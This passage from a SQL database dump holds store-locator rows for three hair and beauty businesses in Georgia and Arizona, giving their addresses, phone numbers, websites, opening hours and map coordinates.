Hair & Image Studio','2021-03-18 17:36:48','2021-03-18 17:40:31','mgs_storelocator/s/t/sty.png','respectstylez@gmail.com','(404) 424-3186',NULL,'respectstylezhair.com','577 Westmeath Dr SW','US','GA','Atlanta','30310','<p>An exclusive barber shop, with a warm atmosphere that specializes in precision haircuts, professionalism, and great consistent customer service. Promoting healthy skin, scalp, and hair. More than a haircut it\'s an experience; where \"your barber loves you\"</p>','<p>Sun Closed Mon Closed Tue 11:00 AM - 7:00 PM Wed 11:00 AM - 9:00 PM Thu 11:00 AM - 9:00 PM Fri 11:00 AM - 9:00 PM Sat 11:30 AM - 6:30 PM</p>',NULL,NULL,1,'33.739422','-84.446373'),(23,'Ginaug Beauty Supply','2021-03-19 03:02:05','2021-03-19 03:02:05','mgs_storelocator/g/i/ginaug.jpeg',NULL,'(770) 339-0036',NULL,NULL,'2339 Lawrenceville Hwy #102,','US','GA','Lawrenceville','30044',NULL,NULL,NULL,NULL,1,'33.815224','-84.268331'),(24,'Nappy By Nature','2021-04-12 02:13:50','2021-04-12 16:32:35','mgs_storelocator/n/a/nappy.png','nappybynature@gmail.com','480-838-6668',NULL,'nappybynatureaz.com','2618 W Baseline Rd','US','AZ','Mesa','85202','Nappy By Nature has been keeping the local community looking and feeling great with professional haircuts, styling, and salon services. We offer a clean and cozy atmosphere and our friendly stylists are ready to help you with your style wants and needs. Nappy By Nature offers a full line of services for men and women of all ages.',NULL,NULL,NULL,1,'33.37863','-111.891048');

--
